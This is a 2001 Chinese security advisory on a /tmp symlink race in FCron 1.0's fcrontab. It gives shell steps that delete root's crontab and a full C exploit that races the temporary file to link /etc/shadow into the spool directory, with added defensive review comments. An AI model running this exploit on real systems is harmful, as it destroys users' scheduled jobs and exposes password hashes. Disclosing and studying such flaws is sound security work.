Thibault Godouet Fcron存在符号连接漏洞
发布时间:2001-06-13
更新时间:2001-06-13
严重程度:中
威胁程度:本地拒绝服务
错误类型:竞争条件
利用方式:服务器模式

受影响系统
Thibault Godouet FCron 1.0

详细描述
FCron是一个用于定时执行任务的UNIX程序,可以以特定用户的身份运行。由于fcrontab在/tmp目录下以不安全的方式建立临时文件(从下面的输出可以看到,文件名是/tmp/fcrontab.加进程号,可以被预先猜到),造成符号连接漏洞:攻击者可以建立指向其他fcron用户文件的符号连接,造成不同程度的拒绝服务攻击。
注:本页后文的示例程序声称可以借同一问题取得/etc/shadow的内容,因此实际影响可能不限于拒绝服务。

测试代码
1,安装一个crontab,以root用户举例:
    root# ls -l /var/spool/fcron/
    total 0
    root# echo '0 0 * * * echo test' | fcrontab -
    09:53:00 installing file /tmp/fcrontab.27301 for user root
    Modifications will be taken into account right now.
    root# ls -l /var/spool/fcron/
    total 2
    -rw------- 1 root root 110 May 7 09:53 root
    -rw------- 1 root fcron 20 May 7 09:53 root.orig
2,以普通用户身份编写并执行脚本:
    uwe$ cat ~/x
    #! /bin/sh
    ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$
    exec fcrontab - <<EOF
    * * * * * false
    EOF
    uwe$ ./x
    09:55:55 installing file /tmp/fcrontab.27536 for user uwe
    09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission denied
3,ROOT用户查看fcron spool目录:
    root# ls -l /var/spool/fcron/
    total 3
    -rw-r----- 1 uwe fcron 16 May 7 09:55 rm.root
    -rw------- 1 root root 110 May 7 09:53 root
    -rw------- 1 root fcron 20 May 7 09:53 root.orig
4,以普通用户编辑crontab:
    uwe$ echo '* * * * * true' | fcrontab -
    09:59:15 installing file /tmp/fcrontab.27543 for user uwe
    Modifications will be taken into account at 10h00.
5,以ROOT用户等1分钟,然后查看fcron spool目录:
# ls -l /var/spool/fcron/
total 3
-rw------- 1 root fcron 20 May 7 09:53 root.orig
-rw------- 1 root root 102 May 7 09:59 uwe
-rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig
6,root的crontab已经没有了,查看你的备份。

/* -------------------------- fcrontab exploit by _kiss_ -------------------------- */
/*
 * Proof-of-concept listing published with this advisory.
 *
 * What the code does, as written:
 *   1. rescans /tmp until a directory entry whose name starts with
 *      "fcrontab" shows up;
 *   2. polls stat() on that path until st_mtime differs from the first
 *      value it recorded;
 *   3. builds the command "ln -fs /etc/shadow <path>" and hands it to
 *      system(), i.e. asks ln to force-create a symlink at that path.
 * It ends by printing a message; it never checks what actually happened.
 *
 * Defensive reading: per the advisory, fcrontab creates its temporary file
 * in /tmp insecurely, and the name seen in the transcripts is guessable
 * (/tmp/fcrontab.<pid>). Code that handles a temporary file on behalf of a
 * user should create it with mkstemp() (or open() with O_CREAT|O_EXCL),
 * preferably in a directory only the program itself can write, keep using
 * the descriptor it opened rather than re-opening by name, and validate
 * with fstat() on that descriptor; O_NOFOLLOW rejects a symlink in the
 * final path component.
 * Monitoring hint: a symlink named fcrontab.* in /tmp that points outside
 * /tmp is worth alerting on.
 *
 * NOTE(review): this listing is not well-defined C as it stands -- it uses
 * strncmp/strcpy/strcat/system without including their headers, declares
 * main as void, ignores the result of opendir(), and reads direntry after
 * closedir(). Treat it as an illustration of the race, not reference code.
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <time.h>
#include <dirent.h>
#define TRUE 1
void main() {
  struct stat buf;          /* metadata of the watched /tmp entry */
  time_t modif1,modif2;     /* first-seen and latest modification times */
  DIR *dir;
  struct dirent *direntry;
  int found=0;
  char string[200];         /* "/tmp/" + matched entry name */
  char string2[200];        /* shell command passed to system() */
  printf ("---------------------------------------------\n");
  printf (" fcrontab exploit by _kiss_\n");
  printf (" Helios Security and Administration (HeliSec)\n\n");
  printf (" Greets: Jet-Li (for teaching me some lessons of shell\n");
  printf (" that i will need someday) :D\n");
  printf ("---------------------------------------------\n");
  /* we wait till /tmp/fcrontab is created */
  printf("\nwaiting for /tmp/fcrontab to be created...\n");
  /* busy loop with no delay: /tmp is re-opened and rescanned until a match */
  while(!found) {
    dir=opendir("/tmp");
    while ((direntry=readdir(dir))!=NULL) {
      /* only the first 8 characters of the name are compared */
      if (strncmp("fcrontab",direntry->d_name,8)==0) found=1;
      if (found==1) break;
    }
    closedir(dir);
  }
  /* NOTE(review): direntry was obtained from the stream closed just above;
     the copies below are unbounded into a 200-byte buffer */
  strcpy(string,"/tmp/");
  strcat(string,direntry->d_name);
  /* spins until stat() on the path succeeds, leaving its metadata in buf */
  while (TRUE) {
    if (stat(string,&buf)!=-1) break;
  }
  /* we store date of last modification */
  printf("/tmp/fcrontab created. waiting for the update...\n");
  modif1=buf.st_mtime;
  /* we wait till /tmp/fcrontab is updated */
  /* the result of stat() is not checked inside this loop */
  do {
    stat(string,&buf);
    modif2=buf.st_mtime;
  } while (modif1==modif2);
  /* we make the symlink */
  printf("making a symlink to /etc/shadow...\n");
  /* the command line is assembled by concatenation and run through the shell */
  strcpy(string2,"ln -fs /etc/shadow ");
  strcat(string2,string);
  system(string2);
  /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */
  /* the outcome is only announced here, not verified by the program */
  printf("... now check /var/spool/fcron/kiss.orig\n");
}

解决方案 使用不存在此漏洞的版本。 相关信息 |